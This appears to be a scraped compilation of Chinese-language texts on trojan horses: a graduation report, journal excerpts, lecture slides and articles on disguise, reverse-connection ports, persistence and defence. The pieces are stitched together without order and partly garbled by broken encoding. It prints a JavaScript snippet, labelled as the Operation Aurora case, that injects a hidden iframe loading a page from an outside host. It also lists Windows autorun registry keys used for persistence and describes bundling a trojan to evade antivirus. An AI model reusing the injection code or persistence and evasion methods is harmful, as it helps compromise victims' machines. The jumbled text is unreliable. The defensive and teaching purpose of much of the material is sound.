木马技术概述
毕业综合实践报告-计算机木马病毒及防治(防治版)
GDGM-QR-03-077-B/1Guangdong College of Industry & Commerce毕业综合实践报告Graduation synthesis practice report题目:计算机木马病毒及防治(in En glish) Computer Trojan virus research and prevention系别:班级:学生姓名:学号:指导老师:完成日期:目录一、计算机木马病毒的概述及现状 (1)(一)计算机木马病毒的概念 (1)(二)木马病毒的原理 (1)(三)木马病毒的特征 (3)(四)木马病毒的危害 (3)(五)计算机木马病毒发展 (4)二、计算机木马病毒的伪装方式 (5)(一)修改图标 (5)(二)捆绑文件 (5)(三)出错显示 (5)(四)定制端口 (5)(五)自我销毁 (5)(六)木马更名 (6)三、计算机木马病毒的防治 (6)(一)如何查出木马 (6)1、检测网络连接 (6)2、禁用不明服务 (6)3、检查系统账户 (6)4、对比系统服务项 (7)(二)如何删除木马病毒 (7)1、禁用系统还原 (7)2、安全模式或VGA模式 (8)(三)如何防范木马病毒 (8)1、截断传染源 (8)2、加强计算机防护 (8)3、善用账号保护工具 (8)四、几款免费的木马专杀工具 (9)(一)冰刃 (9)(二)Windows清理助手 (9)(三)恶意软件清理助手 (9)(四)Atool软件 (9)(五)Windows恶意软件删除工具(mrt.exe) (10)五、结束语 (10)参考文献 (11)内容提要随着信息化时代的到来人类社会生活对因特网的需求日益增长,使得计算机网络技术迅速发展和普及。
因特网使得全世界都联系到了一起。
极大的促进了全球一体化的发展。
但是随着互联网的普及和应用的不断发展,各种黑客工具和网络手段导致网络和用户收到财产损失,其中最严重的就是木马攻击手段。
木马的生存技术
福建电脑2010年第4期(下转第74页)木马的生存技术王勇刚(孝感学院计算机与信息科学学院湖北孝感432000)【摘要】:本文先介绍木马技术,然后从更名换姓、文件捆绑、冒充图片、修改图标四个方面分析了木马的伪装技术,最后从加壳、修改特征码、加花等方面,分析和介绍了木马的生存技术。
【关键词】:木马;伪装;免杀1、木马技术木马以其隐蔽性强,变化迅速以及窃取文件等手段成为当前网络信息系统面临的安全威胁中危害最为严重的攻击手段之一。
木马其实就是一个网络客户/服务程序。
网络客户/服务模式的原理是一台主机提供服务(服务器),另一台主机接受服务(客户机)。
作为服务器的主机一般会打开一个默认的端口并进行监听,如果有客户机向服务器的这一端口提出连接请求,服务器上的相应程序就会自动运行,来应答客户机的请求,这个程序我们称为守护进程。
就我们前面所讲的木马来说,被控制端相当于一台服务器,控制端则相当于一台客户机,被控制端为控制端提供服务。
木马之间传递信息主要是通过端口来进行的。
端口即控制端和服务端之间的数据入口,通过这个入口,数据可直达控制端程序或木马程序。
我们这里所说的端口,不是计算机硬件的I/O 端口,而是软件形式上的概念。
例如,大家浏览网站时就是通过访问服务器的80端口来实现的。
2、木马的伪装技术作为病毒中利用率最高的木马,它的伪装技术也是一流的。
主要有下列几种方式。
伪装方法一:给木马服务端程序更名,木马服务端程序的命名有很大的学问。
木马的命名千奇百怪。
不过大多是改为和系统文件名差不多的名字,如果对系统文件不够了解,那可就危险了。
例如有的木马把名字改为window.exe ,如果不告诉用户这是木马的话,谁也不敢删除。
还有的就是更改一些后缀名,比如把dll 改为d11等(注意看是数字"11"而非英文字母"ll"),不仔细看的话,就不会发现。
伪装方法二:把自己和其它文件捆绑在一起,这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的情况下,偷偷地进入了系统。
计算机病毒与木马技术深度剖析
特性
—功能的特殊性 通常的木马功能都是十分特殊的,除了普通的 文件操作以外,还有些木马具有搜索cache中的口令、
设置口令、扫描目标机器人的IP地址、进行键盘记
录、远程注册表的操作以及锁定鼠标等功能。远程 控制软件当然不会有这些功能,毕竟远程控制软件 是用来控制远程机器,方便自己操作而已,而不是 用来黑对方的机器的。
Presentation Identifier Goes Here 11
伪装方法
木马更名 木马服务端程序的命名也有很大的学问。如果 不做任何修改,就使用原来的名字,谁不知道这是
个木马程序呢?所以木马的命名也是千奇百怪,不过
大多是改为和系统文件名差不多的名字,如果你对 系统文件不够了解,那可就危险了。例如有的木马
3
程序
程序就是一组指令执行序列
如:“原材料获取初步加工精细加零配件组装验收合格检 验(入库)不合格(销毁)” 不同季度、不同情况时采用不同的执行的程序
程序就是一张计划书,记载着先做什么后做 什么,木马其实就是具有破坏后果的程序
如:收集火药买雷管制成炸弹放置到公共场合引爆”
15
4、Ntldr又将系统由原来的16位实模式切换到32位保护模式 或64位长模式。它的工作是读取根目录下的Boot.ini文件, 显示引导菜单。它首先会加载Ntoskrnl.exe、Hal.dll,接
着读入注册表的SYSTEM键文件,从中找出自动启动的各
类驱动程序。 5、Ntoskrnl.exe(或Ntkrnlpa.exe)是内核程序,xp启动 时的LOGO动画,它做的工作实在是太多了,它的最后一 步工作就是创建会话管理子系统,也就是由System进程创
14
系统引导过程
特洛伊木马
• 木马通道与远程控制
– 木马连接建立后,控制端端口和服务端木马端口之间将会出现一 条通道 – 控制端上的控制端程序可藉这条通道与服务端上的木马程序取得 联系,并通过木马程序对服务端进行远程控制,实现的远程控制 就如同本地操作
控制端 控制端 程序 1096 6267 服务端 木马 程序 窃取密码 文件操作 修改注册表 系统操作
32
网页挂马技术(二)
• js调用型网页挂马
– 利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术
<script language=javascript
src=/gm.js></script>
/gm.js就是一个js脚本文件,通过它调用和执行木 马的服务端。这些js文件一般都可以通过工具生成,攻击者只需输入相关 的选项就可以了
5
木马入侵基本过程
控制端 ①配置木马 ②传播木马 ③运行木马 Internet 木马 服务端
④信息反馈
信息
⑤建立连接
⑥远程控制
6
netstat查看木马打开的端口
Proto ① TCP ② TCP Local Address 202.102.47.56 : 6267 202.102.47.56 : 6267 服务端 IP地址 木马 端口 Foreign Address 202.96.96.102 : 1096 0.0.0.0 控制端 IP地址 控制端 端口 State ESTABLISHED LISTENING 连接状态: ①连接已建立 ②等待连接
33
网页挂马技术(三)
• 图片伪装挂马
– 攻击者直接将网页木马加载到图片中
/test.htm中的木马代码植入到test.jpg图片文件中
网页木马机理与防御技术
网页木 马多被用 于让 客户端 过路式 下载“ 盗号木 马” , 窃取 客户端个 人信 息, 它 已经 成为 黑客谋求 经济利 益 的重 要工具 . 围绕着 网页 木马逐渐 形成 了具有 一定规 模、分 工 明确 的地 下经济链 : 股 票账 号、信用 卡账 号乃至
特性, 并总结 防御方的研 究现 状 以及探 讨攻防双方 的发展趋势, 为进一步研 究作参考. 本文第 1 节 介绍 网页木马工 作机制, 主要包括 网页木 马定义 、典 型攻击流程 、漏洞利用 机理及 些 提高攻 击成 功率 、增强 自身 隐蔽性方 面的对抗 手段. 第 2节从监 测 、特 征分析 、防范这 3方面对 网页木马 防御方 的研
J o u r n a l o fS o f t w a r e软件 学报 V o 1 . 2 4 , N o . 4 , Ap r i l 2 0 1 3
网页木 马是近年来 出现的一种 新形态 的恶意代码 , 它通 常被人 为置入 We b服务器 端的 H T ML页面 中, 目的 在 于 向客 户端传播 恶意程 序: 客户 端访 问该页面 时, 它 利用 客户端 浏览器及 其插件 的漏洞 将恶 意程序 自动植入 客 户端 . 网页木 马的表 现形 式是 一个或 一组 有链接 关 系、含 有( 用 J a v a S c r i p t等脚 本语 言编 写 的) 恶意 代码 的 HT ML页面, 恶意代码在 该( 组) 页面被客户 端浏览器 加载 、渲 染的过程 中被执行 并利用浏 览器及插件 中的漏洞 隐蔽地下 载 、安 装 、执 行病毒 或 间谍 软件 等恶意可 执行 文件. 网页木 马是一 种客户 端攻击 方式, 相 比较蠕虫 等 通 过 网络 主动进行 自我复 制、 自我 传播, 网页木 马部署在 网站服 务器端, 在用户 浏览页面 时发起 攻击. 这种客 户 端攻击 方式可 以有效 地绕过 防火墙 的检测 , 隐蔽地 、有效地在 客户 端植入 恶意代码 , 进 而在 用户不 知情 的情 况 下 自动完 成恶意可执 行文件 的下载 、 执行, 国外将这种 攻击方 式称为 Dr i v e — b y — Do wn l o a d (  ̄ , 内直 译为“ 过路式 下
木马的7种分类
木马的7种分类随着计算机技术的不断发展,木马病毒也不断地演化和发展,出现了各种不同类型的木马病毒,本文将介绍木马病毒的七种基本分类。
1.远程控制木马远程控制木马可以通过网络,远程控制受感染电脑的操作系统。
黑客可以远程操作受害者的计算机,以获取其个人信息、机密资料和密码等。
这种木马病毒非常隐蔽,很难被发现,因此危害性相对较大。
2.间谍木马间谍木马主要用于监控用户的行动,例如记录用户的浏览历史记录、键盘输入等。
这种木马病毒通常会将窃取到的数据发送给黑客来实现监控。
3.下载木马下载木马病毒具有下代码、过滤HTML代码等功能,可以从远程服务器下载感染电脑所需的程序或文件。
当这种木马病毒感染到用户的计算机后,可以在后台下载恶意程序或软件。
4.钓鱼木马钓鱼木马通常通过电子邮件、社交网络等方式来欺骗受害者,使其下载木马病毒。
这种木马病毒的危害性非常高,因为它可以窃取受害者的个人信息,例如社交网络的用户账户和密码、银行账户信息等。
5.后门木马后门木马是指在计算机上预留出的一些未经授权的入口,可以让黑客在未经授权的情况下远程访问受害者的计算机系统。
这种木马病毒可以在用户不知情的情况下进行远程控制,非常隐蔽,难以发现。
6.窃密木马窃密木马可以获取用户的账户和密码等个人信息,并将这些信息上传到黑客服务器。
这种木马病毒通常隐藏在诱骗受害者下载的文件、恶意链接等背后。
7.多功能木马多功能木马是一种综合了多种木马病毒功能的复合木马病毒。
它可以通过网络来获取用户的个人信息、远程访问受害者计算机、窃取银行账号密码等敏感信息。
这种木马病毒的危害性非常高,可以严重威胁用户的安全和隐私。
(7)特洛伊木马及防范技术
反弹端口
反弹端口型木马分析了防火墙的特性后发现: 防火墙对于连入的链接往往会进行非常严格的过 滤,但是对于连出的链接却疏于防范。于是,与 一般的木马相反,反弹端口型木马的服务端(被 控制端)使用主动端口,客户端(控制端)使用 被动端口,木马定时监测控制端的存在,发现 控 制端上线立即弹出端口主动连结控制端打开的主 动端口,为了隐蔽起见,控制端的被动端口一般 开在80,这样,即使用户使用端口扫描软件检查 自己的端口,发现的也是类似 TCP UserIP:1026 ControllerIP:80 ESTABLISHED的情况,稍微疏 忽一点你就会以为是自己在浏览网页。
•
信息安全研究中心
木马的一般入侵过程
• 制造木马 设计、编码、配置 • 传播安装 浏览网页、下载软件、上网聊天、发送邮件 • 启动木马 自动启动、关联启动、驱动木马、dll木马 • 建立链接 固定端口、可变端口、反弹端口、ICMP • 远程控制 远程监控、文件操作、系统修改
信息安全研究中心
特洛依木马及防范技术
信息安全研究中心
通讯技术
• 寄生端口(重用端口):将木马的通信连接绑定在通用 端口上(比如80),通过这些服务端口发送信息。因为 木马实际上是寄生在已有的系统服务之上的,因此,扫 描或查看系统端口的时候是没有任何异常的。 反弹端口(反向连接):反弹端口型木马的服务端(被 控制端)使用主动端口,客户端(控制端)使用被动端 口,木马定时监测控制端的存在,发现 控制端上线立即 弹出端口主动连结控制端打开的主动端口。 不用端口:使用ICMP协议进行通讯。由于ICMP报文由 系统内核或进程直接处理因而不通过端口传递数据。
信息安全研究中心
特洛伊木马
木马又称特洛伊木马(trojan horse),它是一种远程控制类黑 客工具。木马的运行模式属于C/S模式,它包括两大部分,即客户端 和服务端。其原理是一台主机提供服务(服务器),另一台主机接受服 务(客户机),作为服务器的主机一般会打开一个默认的端口进行监听。 如果有客户机向服务器的这一端口提出连接请求,服务器上的相应程 序就会自动运行,来应答客户机的请求。
木马程序开发技术:病毒源代码详解
⽊马程序开发技术:病毒源代码详解近年来,⿊客技术不断成熟起来,对⽹络安全造成了极⼤的威胁,⿊客的主要攻击⼿段之⼀,就是使⽤⽊马技术,渗透到对⽅的主机系统⾥,从⽽实现对远程操作⽬标主机。
其破坏⼒之⼤,是绝不容忽视的,⿊客到底是如何制造了这种种具有破坏⼒的⽊马程序呢,下⾯我对⽊马进⾏源代码级的详细的分析,让我们对⽊马的开发技术做⼀次彻底的透视,从了解⽊马技术开始,更加安全的管理好⾃⼰的计算机。
1、⽊马程序的分类 ⽊马程序技术发展⾄今,已经经历了4代,第⼀代,即是简单的密码窃取,发送等,没有什么特别之处。
第⼆代⽊马,在技术上有了很⼤的进步,冰河可以说为是国内⽊马的典型代表之⼀。
第三代⽊马在数据传递技术上,⼜做了不⼩的改进,出现了ICMP等类型的⽊马,利⽤畸形报⽂传递数据,增加了查杀的难度。
第四代⽊马在进程隐藏⽅⾯,做了⼤的改动,采⽤了内核插⼊式的嵌⼊⽅式,利⽤远程插⼊线程技术,嵌⼊DLL线程。
或者挂接PSAPI,实现⽊马程序的隐藏,甚⾄在Windows NT/2000下,都达到了良好的隐藏效果。
相信,第五代⽊马很快也会被编制出来。
关于更详细的说明,可以参考ShotGun的⽂章《揭开⽊马的神秘⾯纱》。
2.⽊马程序的隐藏技术 ⽊马程序的服务器端,为了避免被发现,多数都要进⾏隐藏处理,下⾯让我们来看看⽊马是如何实现隐藏的。
说到隐藏,⾸先得先了解三个相关的概念:进程,线程和服务。
我简单的解释⼀下。
进程:⼀个正常的Windows应⽤程序,在运⾏之后,都会在系统之中产⽣⼀个进程,同时,每个进程,分别对应了⼀个不同的PID(Progress ID, 进程标识符)这个进程会被系统分配⼀个虚拟的内存空间地址段,⼀切相关的程序操作,都会在这个虚拟的空间中进⾏。
线程:⼀个进程,可以存在⼀个或多个线程,线程之间同步执⾏多种操作,⼀般地,线程之间是相互独⽴的,当⼀个线程发⽣错误的时候,并不⼀定会导致整个进程的崩溃。
木马攻击原理及防御技术
3 木马的功能
常见的木马有着各自不同的功能,可以被用作远程控制 器、HTTP 服务器或者键盘记录器,一些大型木马甚至还具 备反侦测的能力,可以隐蔽于各种不起眼的程序中,功能十 分全面。其主要功能如下。
2 木马的分类
互联网不断发展的今天,已涌现出数以千计的木马,下
作者简介:王超(1988-),男,山东泰安人,本科,助理工程师。研究方向:企业信息化建设、信息化系统安全。
— 49 —
计算机工程应用技术
3.1 远程文件管理功能
信息与电脑 China Computer&Communication
2016 年第 20 期
式,网络防火墙主要是在网络通信的过程中封锁木马,而杀 毒软件则是识别木马的特征来进行判断。尽管在国内涌现出 形形色色的防火墙和杀毒软件,但是还是不能彻底消除木马, 主要是因为其自身的隐蔽性和非授权性,多数的软件还做不 到完全识别病毒和木马,技术的局限性是无法彻底消灭木马 的主要原因。可以从以下几方面进行防御。 5.1 培养风险意识 互联网上为用户提供了各种免费的、有趣味的、共享的 软件,浏览者应有选择地去正规的网站下载或者浏览软件, 木马程序中很可能就附带在那些吸引眼球的软件或者游戏 中,对于来历不明的软件最好不要在个人的电脑或者企业的 电脑中使用。电脑上要适当安装一些反病毒软件,或者安装 一些性能较好的防火墙,一旦发现电脑在下载软件的过程中 存在异常情况,如蓝屏、死机,就要使用杀毒软件进行查杀, 在第一时间内找到并且努力消灭木马程序,减少因黑客恶意 攻击造成的损失。 5.2 端口扫描和连接检查 木马服务端在系统中监听某个端口,因此,可以利用扫 描端口检查木马的存在,可以有效搜寻到木马的踪迹。在操 作系统内部可以使用 .netstat-na 命令行查看已经正在监听的 端口和已经建立的连接,同时也可以查看连接的远程主机, 一旦出现木马就可以在第一时间搜索到。 5.3 检查系统进程 多数的木马在运行时会产生进程,因此,检查系统进程 也是防御木马的一种有效手段。管理人员要做好平常的监控 系统进程的工作,维护系统的正常运行,一旦系统内部出现 任何情况,都可以在系统进程中发现木马程序。
木马通信的隐蔽技术
引言木马通常需要利用一定的通信方式进行信息交流(如接收控制者的指令、向控制端传递信息等)。
系统和应用程序一般采用TCP/UDP通信端口的形式与控制端进行通信。
木马一般也是利用TCP/UDP端口与控制端进行通信。
通常情况下,木马进行通信时直接打开一个或几个属于自己的TCP/UDP端口。
早期的木马在系统中运行后都是打开固定的端口,后来的木马在植入时可随机设定通信时打开的端口,具有了一定的随机性。
可是通过端口扫描很容易发现这些可疑的通信端口。
事实上,目前的许多木马检测软件正是通过扫描本地和远程主机系统中打开的已知木马端口进行木马检测的。
木马通信端口成为暴露木马形踪一个很不安全的因素。
为此采用新技术的木马对其通信形式进行了隐蔽和变通,使其很难被端口扫描发现。
2木马通信形式的隐蔽技术木马为隐蔽通信形式所采用的手段有:端口寄生、反弹端口、潜伏技术,嗅探技术。
2.1端口寄生端口寄生指木马寄生在系统中一个已经打开的通信端口,如TCP80端口,木马平时只是监听此端口,遇到特殊的指令才进行解释执行。
此时木马实际上是寄生在系统中已有的系统服务和应用程序之上的,因此,在扫描或查看系统中通信端口时是不会发现异常的。
在Windows9X系统中进行此类操作相对比较简单,但是在WindowsNT/2K系统中实现端口寄生相对比较麻烦。
在控制端与木马进行通信时,如木马所在目标系统有防火墙的保护,控制端向木马发起主动连接就有可能被过滤掉。
2.2反弹端口反弹端口就是木马针对防火墙所采用的技术[1]。
防火墙对于向内的链接进行非常严格的过滤,对于向外的连接比较信任。
与一般的木马相反,反弹端口木马使用主动端口,控制端使用被动端口。
木马定时监测控制端的存在,发现控制端上线,立即主动连接控制端打开的被动端口。
为了隐蔽起见,控制端的被动端口一般开在TCP80。
这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似TCPUSERIP:1026CONTROLLERIP:80ESTABLISHED这种情况,用户可能误认为是自己在浏览网页。
木马的入侵技术
木马的入侵技术木马要进入用户系统,首先要过杀毒软件这一关。
否则一旦杀毒软件报警,木马就无隐蔽性可言了,会立马被杀毒软件赶出系统。
因此,面对杀毒软件,木马使尽浑身解数,通过各种手段隐藏自己。
经过处理后的木马,可以完全无视杀毒软件的存在,正大光明地进入到用户的系统中。
到底木马使用了什么手段能有如此之大的威力呢?请看本文。
如何防范经过处理的木马?木马躲过杀毒软件常用的方法有:寄宿于正常文件、木马加壳加密、修改木马特征码。
结合正文我们来了解一下如何防范经过这些手段处理后的木马。
针对捆绑法,我们使用“木马捆绑克星”这款软件就可以让木马原形毕露。
单击程序界面上的“扫描”按钮,浏览选择可疑文件,如果程序下方的“包含多个可执行文件”选项被打上了钩,这就表示文件被捆绑了。
至于对木马程序进行加壳,根据壳的原理我们可以得知:加壳木马运行后,会将其中的木马程序在内存中还原。
还原后的木马是不受壳的保护的,因此大部分的杀毒软件都会抓住这个机会,将木马铲除。
唯一能对杀毒软件造成一点危害的,就只剩下修改木马特征码这种隐藏手段了。
不过不同的杀毒软件提取同一木马程序的特征码是不同的。
这就意味着我们改一处特征码只能躲避一款杀毒软件的查杀,如果要躲避多款杀毒软件,就需要修改多处特征码,这会对木马隐藏自己造成一定的困难。
因此如果有条件,安装两款杀毒软件也是一个不错的办法。
寄宿于正常文件这个方法就是将木马程序与正常的文件捆绑在一起,当用户运行这个捆绑后的文件时,正常文件和木马程序会同时运行,这样木马就可以隐藏自己,悄悄进入用户的系统。
要让木马实现这个目的只需要下载一个文件捆绑器即可。
以木马老大“灰鸽子”出品的文件捆绑器为例。
单击“文件捆绑器”上的“增加文件”按钮,选择一个正常的可执行文件,例如Flash小游戏等。
再次单击该按钮将我们的木马程序也添加进来,最后单击“捆绑文件”,即可将两个文件捆绑成一个可执行文件。
捆绑木马程序木马加壳加密“壳”是一种专门保护软件的程序,当运行一款加过壳的软件时,首先会运行这个软件的壳,壳会将包含在其中的程序进行还原,给予使用。
常见木马技术和手动检测方法
常见木马技术和手动检测方法2篇标题一:常见木马技术木马技术是黑客利用的一种非法手段,通过在目标主机上植入木马程序,以获取非法掌控权和窃取敏感信息。
下面将介绍一些常见的木马技术。
第一种常见的木马技术是远控木马。
远控木马是指黑客通过互联网远程连接到目标主机,并可以通过该木马程序完全操控这台主机。
远控木马具有隐蔽性强、控制能力广泛等特点,能够实现多种恶意动作,如窃取机密文件、监视用户行为等。
第二种常见的木马技术是键盘记录木马。
键盘记录木马通过记录用户在键盘上的操作,包括输入的账号、密码等敏感信息。
当用户输入账号密码时,键盘记录木马会将这些信息上传给黑客。
这种木马技术通常会潜伏在系统内核中,很难被发现和清除。
第三种常见的木马技术是反向连接木马。
反向连接木马是指木马程序主动连接到黑客控制的服务器上,以获取指令并发送被监控的敏感信息。
相比于传统的远程连接木马,反向连接木马具有更强的隐蔽性和稳定性。
第四种常见的木马技术是网页木马。
网页木马是指黑客通过在网页上插入木马脚本,使访问该网页的用户受到木马程序的感染。
网页木马通常通过浏览器漏洞进行攻击,一旦用户访问了被植入木马的网页,木马程序就能够在用户主机上执行恶意操作。
第五种常见的木马技术是邮件木马。
邮件木马是指黑客通过发送带有恶意附件或链接的邮件,诱骗用户点击下载或访问,从而感染用户的主机。
邮件木马常常伪装成重要文件或信息,以此引诱用户打开附件或访问链接。
总结起来,常见的木马技术包括远控木马、键盘记录木马、反向连接木马、网页木马和邮件木马。
这些木马技术都具有不同的攻击方式和特点,对个人和组织的信息安全构成了严重威胁。
标题二:手动检测方法面对日益复杂的木马攻击,手动检测成为了保护个人和组织信息安全的重要环节。
下面将介绍一些常用的手动检测方法。
第一种手动检测方法是端口扫描。
通过使用端口扫描工具,可以扫描目标主机上开放的端口,从而发现是否有可疑的端口。
一些木马程序常常会监听特定的端口,因此端口扫描可以有效帮助检测木马的存在。
木马的种类及其技术特征
木马的种类及其技术特征常见的木马病毒,按照其功能划分,有以下几类:●网络游戏木马●网银木马●即时通讯软件木马●网页点击类木马●下载类木马●代理类木马下面一一详细介绍。
1.网络游戏木马随着网络在线游戏的普及和升温,我国拥有规模庞大的网游玩家。
网络游戏中的金钱、装备等虚拟财富与现实财富之间的界限越来越模糊。
与此同时,以盗取网游帐号密码为目的的木马病毒也随之发展泛滥起来。
网络游戏木马通常采用记录用户键盘输入、Hook游戏进程API函数等方法获取用户的密码和帐号。
窃取到的信息一般通过发送电子邮件或向远程脚本程序提交的方式发送给木马作者。
网络游戏木马的种类和数量,在国产木马病毒中都首屈一指。
流行的网络游戏无一不受网游木马的威胁。
一款新游戏正式发布后,往往在一到两个星期内,就会有相应的木马程序被制作出来。
大量的木马生成器和黑客网站的公开销售也是网游木马泛滥的原因之一。
2.网银木马网银木马是针对网上交易系统编写的木马病毒,其目的是盗取用户的卡号、密码,甚至安全证书。
此类木马种类数量虽然比不上网游木马,但它的危害更加直接,受害用户的损失更加惨重。
网银木马通常针对性较强,木马作者可能首先对某银行的网上交易系统进行仔细分析,然后针对安全薄弱环节编写病毒程序。
如2004年的“网银大盗”病毒,在用户进入工行网银登录页面时,会自动把页面换成安全性能较差、但依然能够运转的老版页面,然后记录用户在此页面上填写的卡号和密码;“网银大盗3”利用招行网银专业版的备份安全证书功能,可以盗取安全证书;2005年的“新网银大盗”,采用API Hook等技术干扰网银登录安全控件的运行。
随着我国网上交易的普及,受到外来网银木马威胁的用户也在不断增加。
3.即时通讯软件木马现在,国内即时通讯软件百花齐放。
QQ、新浪UC、网易泡泡、盛大圈圈……网上聊天的用户群十分庞大。
常见的即时通讯类木马一般有3种:一、发送消息型。
通过即时通讯软件自动发送含有恶意网址的消息,目的在于让收到消息的用户点击网址中毒,用户中毒后又会向更多好友发送病毒消息。
pdf木马 原理
pdf木马原理引言概述:PDF木马是一种利用PDF文件进行恶意攻击的技术手段,它可以通过植入恶意代码或链接来感染用户的设备,并获取用户的敏感信息。
本文将从六个大点来详细阐述PDF木马的原理。
正文内容:1. PDF文件的结构:1.1 PDF文件的基本结构:PDF文件由头部、交叉引用表、对象和内容流等组成。
1.2 PDF文件的对象类型:PDF文件中的对象可以是字典、数组、字符串等不同类型,这些对象可以通过对象引用进行关联。
2. PDF木马的植入方式:2.1 恶意代码的植入:攻击者可以通过在PDF文件中嵌入恶意代码,如JavaScript脚本或Flash动画等,以实现对用户设备的攻击。
2.2 恶意链接的植入:攻击者可以将恶意链接嵌入到PDF文件中,当用户点击该链接时,将被导向恶意网站或下载恶意文件。
3. PDF木马的执行过程:3.1 用户打开PDF文件:用户双击或通过浏览器打开PDF文件时,PDF阅读器将解析文件并加载其中的内容。
3.2 恶意代码或链接的触发:当PDF文件中存在恶意代码或链接时,阅读器在加载过程中会执行这些代码或触发链接,从而进行攻击。
3.3 攻击行为的实施:一旦恶意代码或链接被执行,攻击者可以利用该漏洞进行各种攻击行为,如窃取用户信息、传播病毒等。
4. PDF木马的危害:4.1 用户信息泄露:攻击者可以通过PDF木马获取用户的敏感信息,如账号密码、银行卡信息等。
4.2 设备感染与控制:PDF木马可以感染用户的设备,控制设备执行恶意指令,从而对用户设备进行控制。
4.3 恶意文件传播:攻击者可以通过PDF木马将恶意文件传播给其他用户,进一步扩大攻击范围。
5. 防范PDF木马的措施:5.1 更新PDF阅读器:及时更新PDF阅读器的版本,以修复已知的漏洞。
5.2 谨慎打开PDF文件:不要打开来历不明的PDF文件,尤其是从不可信的来源下载的文件。
5.3 安装杀毒软件:在设备上安装杀毒软件,及时进行病毒扫描,以防止PDF 木马的感染。
【木马各种隐藏技术全方位大披露】 被木马隐藏的文件
【木马各种隐藏技术全方位大披露】被木马隐藏的文件以前,我曾认为只要不随便运行网友发来的文件就不会中病毒或木马,但后来出现了利用漏洞传播的冲击波、震荡波;以前,我曾认为不上小网站就不会中网页木马,但后来包括国内某知名游戏网站在内的多个大网站均在其首页被黑客挂上了木马。
从此,我知道:安全,从来没有绝对的。
虽然没有绝对的安全,但如果能知已知彼,了解木马的隐藏手段,对于木马即使不能百战百胜,也能做到及时发现,使损失最小化。
那么,木马究竟是如何躲在我们的系统中的呢?最基本的隐藏:不可见窗体+隐藏文件木马程序无论如何神秘,但归根究底,仍是Win32平台下的一种程序。
Windows下常见的程序有两种:1.Win32应用程序(Win32 Application),比如QQ、Office等都属于此行列。
2.Win32控制台程序(Win32 Console),比如硬盘引导修复程序FixMBR。
其中,Win32应用程序通常会有应用程序界面,比如系统中自带的"计算器"就有提供各种数字按钮的应用程序界面。
木马虽然属于Win32应用程序,但其一般不包含窗体或隐藏了窗体(但也有某些特殊情况,如木马使用者与被害者聊天的窗口),并且将木马文件属性设置为"隐藏",这就是最基本的隐藏手段,稍有经验的用户只需打开"任务管理器",并且将"文件夹选项"中的"显示所有文件"勾选即可轻松找出木马(见图1),于是便出现了下面要介绍的"进程隐藏"技术。
第一代进程隐藏技术:Windows 98的后门在Windows 98中,微软提供了一种能将进程注册为服务进程的方法。
尽管微软没有公开提供这种方法的技术实现细节(因为Windows的后续版本中没有提供这个机制),但仍有高手发现了这个秘密,这种技术称为RegisterServiceProcess。
只要利用此方法,任何程序的进程都能将自己注册为服务进程,而服务进程在Windows 98中的任务管理器中恰巧又是不显示的,所以便被木马程序钻了空子。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
。
• 第五代木马反弹式木马。
木马实例演示 (example of a simple Trojan)
• 演示木马:灰鸽子 • 简介 灰鸽子,学名为win32.hack.huigezi,是国内一款著名后门程序 ; 比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者 ,功能强大,有6万多种变种; 开发者是葛军,该木马的客户端和服务端都是采用Dephi编写 ; 服务端对客户端连接方式有多种,使得处于各种网络环境的用 户都可能中毒,包括局域网用户(通过代理上网)、公网用户 和ADSL拨号用户等; 使用了进程隐藏、线程注入、重复加壳等多种病毒技术,连续 三年被国内各大杀毒厂商评选为“年度十大病毒”。
• 命令广播:可以对自动上线主机进行命令广播,如关 机、重启、打开网页,筛选符合条件的机等,点一个 按钮就可以让N台机器同时关机或其它操作; • 消息广播:可以向对方主机发送消息;
木马植入方法(propagation mechanisms)
直接攻击
电子邮件
经过伪装的 木马被植入 目标机器
ቤተ መጻሕፍቲ ባይዱ
文件下载
浏览网页
例子(CVE2010-0249,Operation Aurora)
• • • • • • • • function Get(){ var Then = new Date() Then.setTime(Then.getTime() + 24*60*60*1000) var cookieString = new String(document.cookie) var cookieHeader = "Cookie1=" var beginPosition = cookieString.indexOf(cookieHeader) if (beginPosition != -1){ } else {document.cookie = "Cookie1=risb;expires="+ Then.toGMTString() • document.writeln("<iframe src=http://pagead2.googlesyndication.xx.xx/pagead/aur ora.htm width=0 height=0></iframe>"); • }}Get();
b)RunServicesOnce注册表服务项 HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\RunServicesOnce HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\RunServicesOnce (3)修改系统配置文件 a)在Win.ini中启动 在Win.ini的[windows]字段中有启动命令“load=”和 “run=”,在一般情况下“=”后面是空白的,如果有 后跟程序,比方说是这个样子: run=c:\windows\file.exe load=c:\windows\file.exe file.exe就会在计算机启动的时候启动。
合并文件
+
QQ等
1、直接攻击法 利用系统漏洞(如MS06-14、MS07-17和MS07004,MS08-067),通过端口扫描,漏洞扫描和网络渗 透,将木马程序发送并安装到远程计算机中,这种方 法方便、快捷,攻击效果比较明显,很多病毒都是通 过这种方法进行传播。 2、文件下载法 将木马程序与软件捆绑在一起,或者将木马伪装成破解 工具、漂亮的屏保、图像文件或游戏程序等,放在FTP 服务器、WEB站点或者BT站点提供下载,当用户下载 并打开或者运行这些文件的同时安装了木马。 3、U盘传染法 利用Windows的自动播放功能,双击该U盘以后,木马就 自动运行,并成功植入到目标用户机器中。
c)Winlogon注册表启动项 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\ CurrentVersion\Winlogon d)Load注册表启动项 HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\Curr entVersion\Windows\load (2)注册成系统服务 a ) RunServices注册表服务项 HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\RunServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\RunServices
例子(CVE2010-0188)
例子(CVE2010-0188)
木马的行为特征 Q:How you can know if you are under Trojan horse attack?
木马的运行主要分为两个阶段:
